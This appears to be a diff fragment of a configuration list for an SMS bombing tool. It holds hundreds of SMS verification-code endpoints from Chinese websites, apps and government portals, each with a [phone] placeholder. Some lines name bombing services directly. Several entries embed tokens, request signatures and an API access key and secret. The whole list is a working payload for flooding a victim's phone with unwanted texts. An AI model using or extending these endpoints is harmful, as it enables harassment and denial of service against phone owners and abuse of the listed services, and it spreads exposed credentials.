"http://user.yuntuds.net/register_get_valid_number?sign=a316b3d460901f104f9e8e84662640c0&phone_number=[phone]&nwtime=1548162361&_u=acde09261c08497067779e1fd4ee4a6e&version=4.5.1&platform=android&appx=yuntu&apppn=org.fungo.fungolive&channel=tencent&market=32&os_versi", - "https://app.leyou.com.cn/system/sendSms?mobile=[phone]&sign=fb0a624aade8b0e135196025cbc191c2&transtype=reg_m", - "http://hall.m.qxiu.com/mobileuser/user/getphonecode?phone=[phone]&sign=8D0A118A972CD8A303403728659FC0F4FA194447", - "http://yinyu.leanapp.cn/tools/getNum?&phone=[phone]&sign=4ee234df92d36632c5a7082399b9890a&timestamp=1567136457", - "http://smsspub.mail.163.com/mobileserv/fsms.do?product=AndroidMail&template=ds&callback=sendCallback0&_=1430485975547&mobile=[phone]", - "https://news-api.prest3.com/api/users/sendMessageForRegLogin?phone=[phone]", - "http://member.cabplink.com/sso/sendRegisterSMS.zaction?mobile=[phone]", - "https://gongdu.youshu.cc/m/sign/msg?callback=jQuery111009421744498287961_1580993309090&nonce=18907&mobile=[phone]&os=ios&timestamp=1569225015&type=mobile&soft=5.4.2&_=1580993309101", - "http://member.cabplink.com/sso/sendRegisterSMS.zaction?mobile=[phone]", - "http://member.cabplink.com/sso/sendRegisterSMS.zaction?mobile=[phone]", - "http://www.yifatong.com/Customers/gettsms?rnd=1570443327.103&mobile=[phone]", - "http://12345.panzhihua.gov.cn/sms/getSMSCode?mobile=[phone]", - "http://dgapi.zczgcn.com/shopSupport?Mobile=[phone]&BusinessId=15886&systemType=android&appVersion=4.1.01&postTime=2019-07-19+00:19:14&timeStamp=1563466754286&method=ShopSupport.GetGuiderLoginVerifyCode&format=json&user=u1city&token=a0ea92fa90904b64becaa5b2bb0b8", - "http://jnggzy.jinan.gov.cn/jnggzyztb/regist_gys/putPhone.do?aa=Math.random()&phone=[phone]", - "http://j.esf.leju.com/ucenter/islejuuser?mobile=[phone]", - "http://api.passport.pptv.com/checkImageCodeAndSendMsg?&scene=REG_PPTV_APP&deviceId=867830021000533&aliasName=[phone]", - "https://esx.3z.cc/index.php?tp=api/send_sms&device_type=iPhone 6s&uid=0&op=reg&appid=6&imei=5C351103-F887-4932-BC59-58C75875EFDE&t=1566798214&pt=2&sign=8737393a0d7dffc46883c5226d482194&ver=1.2.1&phone=[phone]", - "http://uac.10010.com/oauth2/OpSms?callback=jsonp1544753247279&req_time=1544753262715&user_id=[phone]", + "http://bizapi.pezy.cn/qknode/sms/reqSmsCode?df=android&publishid=1003&deviceId=8812baafc8de4fe4&vt=5&screen=720x1280&deviceid=&os=android&proid=qknode&av=MMB29M&appVersion=1.6.1&imei=&ov=6.0.1&osVersion=6.0.1&deviceVersion=Redmi%204A&osLevel=23&phone=[phone]", + "https://www.shencut.com/api/v1.0/code?operate_type=register&mobile=[phone]", + "https://h5.youzan.com/usercenter/member/member/mobilesmscode.json?kdt_id=19161003&mobile=[phone]&verify_times=1", + "http://m.10010.com/mall-mobile/CheckMessage/captcha?phoneVal=[phone]&type=7", + "http://dapi.mting.info/yyting/usercenter/getVerifyCode.action?phoneNum=[phone]&type=0&token=&imei=&nwt=1&q=27&sc=", + "https://open.taou.com/maimai/account/v5/send_reg_login_code_v3?ts=1564817141875&access_token=&appid=4&channel=AppStore&density=2&device=iPhone8,1&imei=5C351103-F887-4932-BC59-58C75875EFDE&launch_uuid=10c094ac9b334bbda6d4f2d251d0501f&mobile=+86-[phone]&net=wifi&", + "http://hbrbapi.hubeidaily.net/amc/client/getAuthCode?mobilephone=[phone]", + "http://passport.csdn.net/account/mobileregister?action=sendMobileCode&mobile=[phone]", + "https://fudao.qq.com/cgi-proxy/common_func/send_sms_code?phone=[phone]", + "https://esx.3z.cc/index.php?tp=api/send_sms&device_type=iPhone%206s&uid=0&op=reg&appid=6&imei=5C351103-F887-4932-BC59-58C75875EFDE&t=1566798214&pt=2&sign=8737393a0d7dffc46883c5226d482194&ver=1.2.1&phone=[phone]", + "http://m.huibo.com/register/getAuthCode?txtPhone=[phone]", + "http://www.98xianyou.com/passport/sign/code.html?mobile=[phone]", + "https://www.jdpay.com/login/register/sendActiveCode.htm?tel=[phone]", + "http://m.10010.com/mall-mobile/CheckMessage/captcha?phoneVal=[phone]&type=2", + "http://dopzuul.dd2007.cn/shangji/officeWebInterface/getYzmByMobile.dd?mobile=[phone]&jsoncallback=jsonpCallback_success&_=1599135066051", + "https://wap.fruitday.com//v3/passport/send_vercode?mobile=[phone]", "http://www.zjzxts.gov.cn/sendMsg.do?modelMethod=sendMessage&phonenum=[phone]", - "http://jnggzy.jinan.gov.cn/jnggzyztb/regist_gys/putPhone.do?aa=Math.random()&phone=[phone]", - "https://app.api.lianjia.com/user/account/sendVerifyCodeForRegisterV2?mobile_phone_no=[phone]&request_ts=1564114069", - "http://pass.hujiang.com/Handler/UCenter?action=SendMsg&callback=&imgCode=&token=&_=&mobile=[phone]", - "http://api.passport.pptv.com/checkImageCodeAndSendMsg?&scene=REG_PPTV_APP&deviceId=867830021000533&aliasName=[phone]", - "http://uac.10010.com/oauth2/OpSms?callback=jsonp1544753247279&req_time=1544753262715&user_id=[phone]", - "http://passport.cnmo.com/index.php?c=Member_Ajax_Register&m=SendMessageCode&Jsoncallback=jQuery18301483604325027934_1570445210207&mobile=[phone]", - "http://demo.q20x.xyz/sms.php?phone=[phone]", - "http://app.jiayouxueba.cn/api/v3/sms/getcode?mobile=[phone]", - "http://12345.panzhihua.gov.cn/sms/getSMSCode?mobile=[phone]", - "http://12345.panzhihua.gov.cn/sms/getSMSCode?mobile=[phone]", - "https://app.api.ke.com/user/account/sendverifycodeforbindmobilev2?mobile_phone_no=[phone]&request_ts=1564116332", - "http://m.renwo.com/Ajax/json.ashx?at=sendregsmsvcode&m=1&mobile=[phone]&_=1551173567991", - "http://www.yifatong.com/Customers/gettsms?rnd=1570443327.103&mobile=[phone]", - "https://www.guiji.ai/site/sms?type=2&mobile=[phone]", - "http://www.709088000.top/api.php?act=user&key=5E3DSmoFEEvDEJWpiz&phone=[phone]", - "http://jnggzy.jinan.gov.cn/jnggzyztb/regist_gys/putPhone.do?aa=Math.random()&phone=[phone]", - "https://masterhands.yladm.com/user/phone/verifycode?app=gaoshou_i&brand=apple&idfa=5C351103-F887-4932-BC59-58C75875EFDE&model=iphone&phone=[phone]&refer=hometabpage&sid=appstore&sign=dfe50ccd14bb2c905e37b4706c5e633c&tcid=5f401e59cddf4345a511010d2c268592&timestamp=1", - "https://plus-api.kankan.com/user/login/sms?from=IOS&mobile=[phone]&sign=b41e46a3446472eaca2c0d0618eb7abd&terminal=IOS", - "http://sqb.xiaoshijie.com/api/1/user/getCaptcha/?_did=00000000-7998-6e7e-026a-0aa25c86693a&_app=sqbao&_atype=android&_network=2&_networkType=0&_t=1556866758&_swidth=1080&_sheight=1920&_imei=861913032338784&_manufacture=ZTE&_model=ZTE+BV0730&_osver=6.0&_tn=0&_st=0&i", - "http://jnggzy.jinan.gov.cn/jnggzyztb/regist_gys/putPhone.do?aa=Math.random()&phone=[phone]", - "http://group.leying.com/user/send-login-or-reg-validate-code?.sig=485fcbb8de19a6031a640e4fba81b7d7&cinema_id=23&city_id=502&client_id=3e5da9998f896&graph_validate_code=&group=20008&mobile=[phone]&pver=7.0&session_id=&source=105001&ver=5.5.5", - "https://app.fangzongguan.com/fangmaster/v4.2/client/quick/user/sendCode?_token=eC1fn3C3WKrzkaIYM2EUYw%3D%3D&phone=[phone]&tag=yhoQ9arXKRk3AqpwPGwklOAb/ghFcjxlx0uZNXuiOhXg6sItA%2BuIMWLFLQzyVfRCP1db%2B11CZSVvwzQvNR8xKgpkH2h9VTHRHAPTgHMWw6q5e1SYTdcMB4er6KEEPEDzFU2yJ3N", - "http://218.29.159.26:9000/website/smsSend?phoneNum=[phone]", - "https://m.mgqr.com/ajax/getcode.ashx?check=0&t=1586567002298&phone=[phone]", - "https://user.daojia.com/mobile/getcode?mobile=[phone]&newVersion=1&bu=112", - "http://www.yundaipay.com/index/user/getMsgCode?username=[phone]", - "http://api.passport.pptv.com/checkImageCodeAndSendMsg?&scene=REG_PPTV_APP&deviceId=867830021000533&aliasName=[phone]", - "http://uac.10010.com/oauth2/OpSms?callback=jsonp1544753247279&req_time=1544753262715&user_id=[phone]", - "http://koudaitong.com/v2/common/sms/captcha.jsonp?callback=jQuery1102020099561656467435_1430461129946&verifyTimes=1&biz=kdt_account_captcha&_=1430461129949&mobile=[phone]", - "http://passport.cnmo.com/index.php?c=Member_Ajax_Register&m=SendMessageCode&Jsoncallback=jQuery18301483604325027934_1570445210207&mobile=[phone]", - "http://m.logofree.cn/misc.php?act=send_sms&m=[phone]&token=f3c95f20b6628ae17a40111ebf4170e8", - "https://app.fangzongguan.com/fangmaster/v4.2/client/quick/user/sendCode?_token=eC1fn3C3WKrzkaIYM2EUYw%3D%3D&phone=[phone]&tag=yhoQ9arXKRk3AqpwPGwklOAb/ghFcjxlx0uZNXuiOhXg6sItA%2BuIMWLFLQzyVfRCP1db%2B11CZSVvwzQvNR8xKgpkH2h9VTHRHAPTgHMWw6q5e1SYTdcMB4er6KEEPEDzFU2yJ3N", - "http://www.hyb100.com/huoyb/vc10001.action?userid=[phone]&ic10000=", - "http://app.syxwnet.com/?app=member&controller=index&action=validate&do=mobile&mobile=[phone]", - "http://jnggzy.jinan.gov.cn/jnggzyztb/regist_gys/putPhone.do?aa=Math.random()&phone=[phone]", - "http://m.robotest.cn/user/sms.html?tel=[phone]", - "http://m.robotest.cn/user/sms.html?tel=[phone]", - "http://api.moonreader.cn:80/mreader/common/sendMobile.do?mobile=[phone]", - "http://sapi.16888.com/app.php?mod=account&extra=mobileCode&mobile=[phone]", - "http://xinweixin.11183.com.cn/youzheng/login/security?phone=[phone]", - "https://pass.cctalk.com/v2/Handler/UCenter?action=SendMsg&mobile=[phone]", - "http://api.passport.pptv.com/checkImageCodeAndSendMsg?&scene=REG_PPTV_APP&deviceId=867830021000533&aliasName=[phone]", - "http://app.jiayouxueba.cn/api/v3/sms/getcode?mobile=[phone]", - "http://www.aipai.com/app/www/apps/ums.php?step=ums&mobile=[phone]", - "http://www.aipai.com/app/www/apps/ums.php?step=ums&mobile=[phone]", - "https://uac.10010.com/portal/Service/SendMSG?callback=jQuery172076565523879526_1506486642542&req_time=1506486656403&mobile=[phone]", - "http://www.lamall.com/user/sendsmscode?jsonpCallback=$.jsonp.jsonp1445158351&mobile=[phone]", - "http://reg.suning.com/ajax/code/sms.do?scen=WAP_WCHAT_PUB_ACCT_UNION_LOGIN_MOBILE_REG&phoneNum=[phone]", - "http://i.vaakwe.com/user/reg_send_code.php?mobile=[phone]&country=0086&udid=a884f6c7f15ff08a97ab16e4d33fe2c216a9ebed&imei=02:00:00:00:00:00&mac=02:00:00:00:00:00&imsi=02:00:00:00:00:00&token=ba4edbf30bc5363ba02875fc4c6b25c8a21ed8a99e21c5c40ff6385c43c71c8b&type=sms&", - "http://www.aipai.com/app/www/apps/ums.php?step=ums&mobile=[phone]", + "https://login.51job.com/ajax/sendphonecode.php?jsoncallback=jQuery183018066339418540722_1589810779142&phone=[phone]&nation=CN&type=13&from_domain=i&verifycode=&_=1589810786512", + "http://api-v1.ezpaychain.com/invoice/v1/user/send-sms?calling_codes=%2B86&phone_number=[phone]&type=activation&version=1", + "http://dns.shboka.com:22009/F-ZoneService/getValidNumber?phone=[phone]", + "http://smsspub.mail.163.com/mobileserv/fsms.do?product=AndroidMail&template=ds&callback=sendCallback0&_=1430485975547&mobile=[phone]", + "http://www.huobiao.cn/core/login/get_code_snv?jsonpcallback=jQuery22408161556854897054_1570699976143&phone=[phone]", + "http://api.hiwemeet.com/register/auth_code?phone=[phone]", + "https://gateway-api.kuainiujinke.com/etrack/record?date=2019-09-02&refer=https%3A%2F%2Fwww.daishangqian.com%2Fm%2F%23%2Fuser%2Flogin&source=dsq&timestamp=1567390955843&traceId=A15C586B-6CFF-47C7-81FF-3ACFFB39D046&uid=&url=https%3A%2F%2Fwww.daishangqian.com%2Fm%2F%2", + "http://ws.sythealth.com/wsbyte/fit/v4/sms/validatorcode?form=0&account=[phone]", + "http://www.4008123123.com/phhs_ios/sendSmsCodeVip.action &accessType=1&circleId=100000055 username=[phone]", + "http://mobile.rrjc.com/mobile/service.do?operate=2&VersionValue=V2.3.2&vc=29&paramMap.hardwareDpi=1280x720&paramMap.androidBrand=Android&paramMap.hardwareVersion=NoxW&paramMap.systemVersion=4.4.2&type_method=IDX_SENDCODENOLOGIN&appLineNumber=20161123132705&userAppId=f4b7d231-42d5-4220-880a-21223a874c2b&signRrjcMsg=03fb3195732bf4b53cbfe65c342d3980&paramMap.cellphone=[phone]", + "http://www.aipai.com/app/www/apps/ums.php?step=ums&mobile=[phone]&callback=jQuery17209171715653229815_1599374652809&_=1599374671117", + "https://couple-api.jizhangapp.com/login/captcha/[phone]", + "https://register.7moor.com/Action?callback=jQuery17202698357481160306_1589614815141&action=register.rl7mWebSiteYZMWebCallTryMobileCode&data=%7B%22mobile%22%3A%22[phone]%22%7D&_=1589614821972", + "http://uac.10010.com:80/oauth2/OpSms?callback=jsonp1557631709566&req_time=&user_id=[phone]", + "https://donutenglish.koolearn.com/api/message/send_vcode?callback=jQuery111009421744498287961_1580993309090&use=5&sign=1CE8E4BE7B71ABA57CBF20762AF78A0C&mobile=[phone]", + "https://register.7moor.com/Action?callback=jQuery17202579936653179218_1584495041683&action=register.rl7mWebSiteYZMWebCallTryMobileCode&data=%7B%22mobile%22%3A%22[phone]%22%7D&_=1584495050906", + "http://pubacc.mobile.qq.com/mqqweb-pubacc/mqqweb/cgi-bin/lightalk/msgnewsend?phone=[phone]", + "http://www.52gcc.com/bomb/index.php?hm=[phone]", + "https://im.molinsoft.com/validate.jsp?randromid=0.2002692325464066mobileNumber=[phone]", + "http://m.health.pingan.com/mapi/smsCode.json?deviceId=5a4c935cbb6ff6ca&deviceType=SM-G9300&timestamp=1545122608&app=0&platform=3&app_key=PAHealth&osversion=23&info=&version=1.0.1&resolution=1440x2560&screenSize=22&netType=1&channel=m_h5&phone=[phone]", + "https://gwc.drugs360.cn/index.php?r=UserCenter/getCellphoneCode&type=4&cellphone=[phone]", + "http://www.zuisgo.com/index.php?s=/api/mobile_verify_code_get_request/index2&firewallToken=jkjslfskjk8545sfsdf&uid=&token=&loginTime=&mobile=[phone]&type=register&sign=999eb3cf7e7998d07b78e21884433f74", + "http://care.seewo.com/easicare/account/dynamic/code?userName=[phone]&isLogin=false", + "http://member.ehaier.com/sendMobileSmsVerify.html?mobile=[phone]", + "http://www.lamall.com/user/sendsmscode?jsonpCallback=$.jsonp.jsonp1445158351&mobile=[phone]", + "http://www.dangaoss.com/h5/acc/send_code?_t=1552475308&sign=424064b2d2d003d83db05380438824cb&username=[phone]", + "https://api.taoelement.vip/account/sms/sms/captcha/[phone]", + "http://api.gaotu100.com/user/v2/send_passcode?captcha_mode=NETEASE&type=3&mobile=[phone]&code_type=0", + "http://w.xyhsoft.com:80/pypay/xyhpay/util/ZsendCode.do?phone=[phone]", + "http://1314.buzz/index.php?hm=[phone]", + "http://www.maimaishichang.com/m/reg/motregchk.php?mob=[phone]", + "http://api.hsj.huanci.net/index.php/api/user/isPhoneRegister?appVer=1.1.0&cur_user_id=-1&device=iPhone%206S&device_brand=Apple&device_model=iPhone&os_version=12.4&phone=[phone]&platform=iOS&token=&userId=-1&version_code=110", + "http://api.hhyp58.com/basis/sendCheckCode?mobile=[phone]", + "http://u.danongchang.cn/User/CheckUserMess.aspx?type=3&dhhm=[phone]", + "https://appapi.51job.com/api/user/get_verification_type.php?mobilephone=[phone]", + "https://babyheartapi.ihealthbaby.cn/BabyheartServer/sms/sendMessage?sendType=1&smsType=1&tel=[phone]", + "https://passport.fanhuan.com/login/asklogincode?callback=jQuery18307125578716707999_1546707858677&_=1546707872507&mobile=[phone]", + "http://koudaitong.com/v2/common/sms/imgcaptcha.jsonp?callback=jQuery1102020099561656467435_1430461129946&captcha_code=0722&_=1430461129948&mobile=[phone]", + "http://www.henhuoapp.com/api/method/getCode?phone=[phone]", + "http://vip.haier.com:80/vipCode/user/sendMobileCode?sendType=codeLogin1&domainName=Haier&mobile=[phone]", + "http://ttq.api.yolanda.hk/api/v5/users/identifying_code.json?address=&app_id=TTQ&app_revision=2.2.2&cellphone_type=iPhone 6s-12.4&login=[phone]&mob_type=1&platform=iphone&send_type=1&systemLaunguage=zh-Hans-CN", + "http://admin.bolemeng.com/index.php/api/Common/sms?callback=jQuery21102979887340557068_1582428078445&phone=[phone]", "http://app.quanlaoda.com/app.php?&m=code&a=send_login_code&phone=[phone]", - "https://mc.imways.com/wechat/member/info/sendmsg?mobile=[phone]", - "http://m.10010.com/mall-mobile/CheckMessage/captcha?phoneVal=[phone]&type=4", - "http://api.passport.pptv.com/checkImageCodeAndSendMsg?&scene=REG_PPTV_APP&deviceId=867830021000533&aliasName=[phone]", - "http://www.aipai.com/app/www/apps/ums.php?step=ums&mobile=[phone]", - "http://www.zjzxts.gov.cn/sendMsg.do?modelMethod=sendMessage&phonenum=[phone]", - "http://j.esf.leju.com/ucenter/islejuuser?mobile=[phone]", - "http://api.passport.pptv.com/checkImageCodeAndSendMsg?&scene=REG_PPTV_APP&deviceId=867830021000533&aliasName=[phone]", - "http://newm.yktour.com.cn/api/captcha/login/info/get?mobile=[phone]", - "http://duanxin.diluw.com/index.php?hm=[phone]", - "http://m.robotest.cn/user/sms.html?tel=[phone]", - "http://i.xfvw.cn/api/sms/send?mobile=[phone]", - "http://dgapi.zczgcn.com/shopSupport?Mobile=[phone]&BusinessId=15886&systemType=android&appVersion=4.1.01&postTime=2019-07-19+00%3A19%3A14&timeStamp=1563466754286&method=ShopSupport.GetGuiderLoginVerifyCode&format=json&user=u1city&token=a0ea92fa90904b64becaa5b2bb0b8", + "http://www.jiqinging.com/ajax.php?do=getCheckCode+tel=[phone]", + "http://m.10010.com/mall-mobile/CheckMessage/captcha?phoneVal=[phone]&type=23", + "http://ptlogin.4399.com/ptlogin/sendPhoneLoginCode.do?phone=[phone]", + "http://wx.cq3g.cn/shop/sendSmsCode?phone=[phone]", + "https://passport.ziroom.com/verify/code/v2?phone=[phone]&type=1", + "http://www.baixing.com/m/oz/verify/?fromS9=1&identity=[phone]&mobile=[phone]", + "https://login.51job.com/ajax/sendphonecode.php?jsoncallback=jQuery1830021546042600087745_1584433571320&phone=[phone]", + "http://sms.bechtech.cn/Api/send/data/json?accesskey=1730&secretkey=3f198068c6b5c1036f9b38ae0690cc244695a247&mobile=[phone]&content=%E6%82%A8%E7%9A%84%E6%89%8B%E6%9C%BA%E9%AA%8C%E8%AF%81%E7%A0%81%E4%B8%BA%EF%BC%9A3973+%EF%BC%8C%E8%AF%A5%E9%AA%8C%E8%AF%81%E7%A0%8110%", + "https://uac.10010.com/oauth2/OpSms?callback=jsonp1544753247279&req_time=1544753262715&user_id=[phone]&app_code=ECS-YH-WAP", + "http://api.yuyin-tv.com/v1/account/verifycode/register?phone=[phone]", + "http://www.youmw.top/tool/dxhz/?hm=[phone]&ok=", + "https://exmail.qq.com/cgi-bin/bizmail_portal?action=send_sms&type=11&t=biz_rf_portal_mgr&ef=jsnew&resp_charset=UTF8&area=86&mobile=[phone]&img_vc=", "http://218.29.159.26:9000/website/smsSend?phoneNum=[phone]", - "https://uac.10010.com/portal/Service/SendMSG?callback=jQuery172076565523879526_1506486642542&req_time=1506486656403&mobile=[phone]", - "http://m.edaogou.mobi/appweb/user.ashx?act=sendCode&typ=register&mobile=[phone]&_=1551173567948", - "http://passport.cnmo.com/index.php?c=Member_Ajax_Register&m=SendMessageCode&Jsoncallback=jQuery18301483604325027934_1570445210207&mobile=[phone]", - "http://api.v2.msparis.com/common/mobile?channel=App Store-vest&clientId=msparis-ios-4.2.4-vest&mobile=[phone]&platform=ios-vest&rent_mode=2", - "http://m.renwo.com/Ajax/json.ashx?at=sendregsmsvcode&m=1&mobile=[phone]&_=1551173567899", - "http://uac.10010.com/oauth2/OpSms?callback=jsonp1557631709566&req_time=&user_id=[phone]", - "http://www.ahtba.org.cn/Registration/SendSms?phone=[phone]", - "http://www.zjzxts.gov.cn/sendMsg.do?modelMethod=sendMessage&phonenum=[phone]", + "http://group.leying.com/user/send-login-or-reg-validate-code?.sig=485fcbb8de19a6031a640e4fba81b7d7&cinema_id=23&city_id=502&client_id=3e5da9998f896&graph_validate_code=&group=20008&mobile=[phone]", + "http://john.huainanhai.com/mobile/send_mobile_code_v2?phone_no=86-[phone]", + "https://john.ixiaolu.com/account/check_account_name?ab_ver=A&account_name=86-[phone]&app_channel=&device=iPhone8,1&device_id=5C351103-F887-4932-BC59-58C75875EFDE&login_user_id=0&pcid=ae1895f8187711a6bf727e6d14b0588d&phone_sn=9e633777bc1a27c4cb826b1a4c6309dd34eb80", + "http://www.shdsyy.com.cn/web/index.php?classid=9191&action=call&phone=[phone]", + "http://api.passport.pptv.com:80/checkImageCodeAndSendMsg?&scene=REG_PPTV_APP&deviceId=867830021000533&aliasName=[phone]", + "http://m.api.cetv.cn/v2/member?app_version=2.1.0&sign=f631db0bcb5fabc1b76679d9480e4f73&device_id=74:4A:A4:A6:B0:63&time=1561078945566&mobile=[phone]", + "http://api.hsj.huanci.net/index.php/api/user/isPhoneRegister?appVer=1.1.0&cur_user_id=-1&device=iPhone 6S&device_brand=Apple&device_model=iPhone&os_version=12.4&phone=[phone]&platform=iOS&token=&userId=-1&version_code=110", + "http://z.7qi.me/index.php?call=[phone]&ok=", + "https://john.ixiaolu.com/account/check_account_name?ab_ver=A&account_name=86-[phone]&app_channel=&device=iPhone8%2C1&device_id=5C351103-F887-4932-BC59-58C75875EFDE&login_user_id=0&pcid=ae1895f8187711a6bf727e6d14b0588d&phone_sn=9e633777bc1a27c4cb826b1a4c6309dd34eb80", "http://app.zangcun.com/registerCode?mobile=[phone]", + "http://pass.hujiang.com/Handler/UCenter?action=SendMsg&callback=&imgCode=&token=&_=&mobile=[phone]", + "https://mobile.cmbchina.com/DUserManage/UserRegisterNew/URN_Register.aspx?phoneNo=[phone]&showtopbar=true&DeviceType=E&Version=7.1.2&SystemVersion=6.0.1&behavior_entryid=lgf005001", + "https://passport.fanhuan.com/login/asklogincode?callback=jQuery18307700360712450502_1523359569433&mobile=[phone]", + "https://new.yohoboys.com/yohonow/api/register/registerSms?appType=2&app_version=5.9.4&area=86&client_secret=1296d0321e51188e17e698e128961947&client_type=iphone&curVersion=5.9.4&degrees=[]&fromPage=iFP_Nlogin&language=zh-Hans&mobile=[phone]&os_version=12.4&scree", + "https://graph.3vjia.com/captcha/mobile/REG/[phone]", + "http://w4.duoyi.com/p_user/DoNewActCards.aspx?gate=sw&jsoncallback=jQuery18303232165043277003_1483854401800&act=getsmscode&phone=[phone]", + "https://www.wanmeiip.com/source/class/captcha/captcha.php?0.41730894602711244validate=[phone]", + "https://puser.hnzwfw.gov.cn:8081/api/user/sms?mobile=[phone]&_=1590559098473", + "http://bsdt.jhga.gov.cn/egov/jhwas/jsp/info/checkmobile.jsp?mobile=[phone]", + "https://mapi.wandougongzhu.cn/?method=User.sendRegCode&ch=appstore&devid=6850174bf9bcd0264c01eac202a8447e&devname=&devtype=iphone_gg&dpi=750x1334&img_fmt=webp&lang=zh-Hans-CN&loc=&model=iPhone8%2C1&network_type=wifi&os_version=12.4&phone=[phone]&rtick=1566790690.50", + "https://api.guanggao.com/user/sendcheckcode?mobile=[phone]&val=&type=0&platform=Android", + "https://class.hujiang.com/classtopic/handler/phonecaptcha?areaID=87051&phoneNumber=[phone]", + "https://m.ke.qq.com/cgi-bin/tool/apply_sms_code?is_ios=0&raw_phone=[phone]&phone=[phone]&national_code=86&from=1&bkn=1557826707&_=1596758267792", + "http://www.xlcidc.com/chkName.asp?umobie=[phone]", + "https://idecoration.ikongjian.com/user/fetchCode?&deviceId=7676F5C4-1919-4FC8-9436-BBFD5BE87482&mobile=[phone]", + "https://v4.passport.sohu.com/i/smcode/mobile/sblmobile?mobile=[phone]&way=1&appid=116005&callback=passport403_cb1596534389025&_=1596534591810", + "https://app.fangzongguan.com/fangmaster/v4.2/client/quick/user/sendCode?_token=eC1fn3C3WKrzkaIYM2EUYw==&phone=[phone]&tag=yhoQ9arXKRk3AqpwPGwklOAb/ghFcjxlx0uZNXuiOhXg6sItA+uIMWLFLQzyVfRCP1db+11CZSVvwzQvNR8xKgpkH2h9VTHRHAPTgHMWw6q5e1SYTdcMB4er6KEEPEDzFU2yJ3N", + "https://passport.iqiyi.com/apis/user/check_account.action?account=[phone]&agenttype=20&app_version=10.7.5&area_code=86&device_id=5C351103-F887-4932-BC59-58C75875EFDE&device_name=liang\u7684 iPhone&device_type=iPhone8,1&dfp=876bc199dfb98e452da6f0f683179849687da", + "http://app.syxwnet.com/?app=member&controller=index&action=validate&do=mobile&mobile=[phone]", + "http://v2.tgmmvip.com:80/wolong/user/getphonecode?phone=[phone]&deviceid=864680046080077&type=0", + "http://db.3z.cc/index.php?tp=front/reg&appid=0&pt=1&ver=2.2.4&imei=352286900745893&sign=c225f84dad88d1c3521fb0ec39e77d5c&op=verify&phone=[phone]", + "http://wwww.0cskj.top/api.php?act=user&key=L747V6vp26fVFuvp0&phone=[phone]", + "http://sapi.16888.com/app.php?mod=account&extra=mobileCode&mobile=[phone]", + "https://www.xd.com/users/sendRegisterCode?callback=jQuery110201470901275837977_1591599902822&mobile=[phone]&area_code=86&_=1591599902823", + "https://mzone.yqb.com/mzone-http/sms/send_sms[phone]", + "http://zhuikanxs.com/novelapilogin/sendsms?phone=[phone]&idfa=5C351103-F887-4932-BC59-58C75875EFDE&package=sxrqowww.com&version=1.6.9&token=384e798aee87f24f4a228a41df049e27&type=1&timestamp=1567400876&sign=9726d9876bd9e1bbc5667eeadd28e42b", + "http://cash.herjk.com/herjk-server/user/authcode?mobile=[phone]", + "https://dakaapp.troila.com:443/api/v7/index/send_sms?phone=[phone]&expect=0", + "http://passport.kuaichecaifu.com/UserForDeayou/phoneCode?callbackparam=jsonpReturn&phone=[phone]&agent=9&_=1500773935216", + "https://jdapi.jd100.com/uc/v1/getSMSCode?account=[phone]&sign_type=1&use_type=1", + "http://ttq.api.yolanda.hk/api/v5/users/identifying_code.json?address=&app_id=TTQ&app_revision=2.2.2&cellphone_type=iPhone%206s-12.4&login=[phone]", + "https://www.4008123123.com/phhs_ios/isNotExistUser.action?r=0.4572958659946349?phone=[phone]", + "https://id.seewo.com/api/recordSEM?systemCode=care&appVersion=\u5e0c\u6c83\u5b66\u9662SEM&actionType=1111004&channelName=care&deviceId=&_=1547004660553&userId=[phone]", + "http://api.qingmang.me/v1/account.sendVerification?token=&phone=%2B86[phone]&code=70428334", + "http://www.91zcp.com/reg/getVoiceCode?phone=[phone]", + "http://www.zjzxts.gov.cn/sendMsg.do?modelMethod=sendMessage&phonenum=[phone]", + "http://woa.sdo.com/woa/autologin/receiveVerificationSms.shtm?phone=[phone]", + "http://weizhang.58.com/user/login/getcode?mobile=[phone]", + "https://wx.zhonghebuke.com/api/zmweb/v1/user/smsLoginCode&category=signin_or_signupphone_number=[phone]", + "http://jyqb.jyqb168.com/registerH5/registerCode?phone=[phone]", + "https://api.aihecong.com/account/vercode?type=register&antiBrush=ecdfddd24937106ex&callback=JSONP_1580388414994&tel=[phone]", + "http://www.fcbox.com/noshiro/retrievePhoneMessagePreventAttacks?mobilePhone=[phone]&smsType=5", + "http://www.v5kf.com/member/index/ajax_sms_code?mobile=[phone]", + "http://www.reedoun.com/os/user/getCode?mobile=[phone]&type=1", + "http://my.cnki.net/elibregister/Server.aspx?mobile=[phone]", + "http://511xy.pw/?hone=[phone]&s=1&admin=666", + "https://www.tongquwangluo.com/api/v2/register/sendCode?mobile=[phone]&token=d19f72dbe0834107ae2007fc43d8ab79&secret=aKM2o9pwNeUkhmxx5z7RuQ==", + "http://wsxf.gjxfj.gov.cn/zfp/getyzmservice/getyzm?theme=none&act=addNew2mb=[phone]", + "https://passport.fanhuan.com/login/asklogincode?callback=jQuery183041957833420943325_1584502778631&mobile=[phone]", + "http://sapi.16888.com/app.php?mod=account&extra=mobileCode&mobile=[phone]", + "https://my.800hr.com/inc/checkcode/?width=60&high=30&size=12&tm=21m25s13&type=1&channel=2&act=getphonecode®_code=user_phone=[phone]", + "http://reg.uuyoyo.com/AshxHandler/AjaxRegHandler.ashx?action=reg_phone_code_send&_=&phone=[phone]", + "https://api.dongqiudi.com/v3/useract/app/user/postGottenlCode?phone=[phone]&requestTime=1596183059901", + "http://www.ksdao.com/sendMsgCode?mobile=[phone]", + "http://j.esf.leju.com/ucenter/islejuuser?mobile=[phone]", + "https://login.zbj.com/register/sendRegisterCode?sacc= [phone]", + "http://api.qingmang.me/v1/account.sendVerification?code=1566478386.8872059778&phone=%2B86[phone]&token=YzllOTI2NGEtYzRkYi0xMWU5LTgxY2ItMDAxNjNlMDM2OTg5&platform=life_ios&udid=966d9749eb41b1f81489cabc0bc05c35a1f97032&v=2.6.12&vc=6", + "https://m.300.cn/verify/message?is_ajax=1&callback=jQuery19109805433584210501_1596669590055&mobile=[phone]&_=1596669590060", + "https://app.hbooker.com/signup/send_verify_code?callback=jQuery111009421744498287961_1580993309090&account=62634757818&app_version=2.3.102&hashvalue=1b817ef4600f743b4517f40764cd4705&device_token=iPhone-3D34A72B-B07D-4260-BF0F-EDBC96F214B9&verify_type=1&phone_num=1-", + "http://sa.ec-ego.com:8080/sms/smsCode/getCode?mobilePhone=[phone]&type=register&exp=JMS", + "http://jzplatform.com/distributor/sendcode_do.phpe.account=[phone]", + "http://appsfunc.e-giordano.com/SVC/AppsFunc.svc/rest/CheckUserName?username=[phone]", + 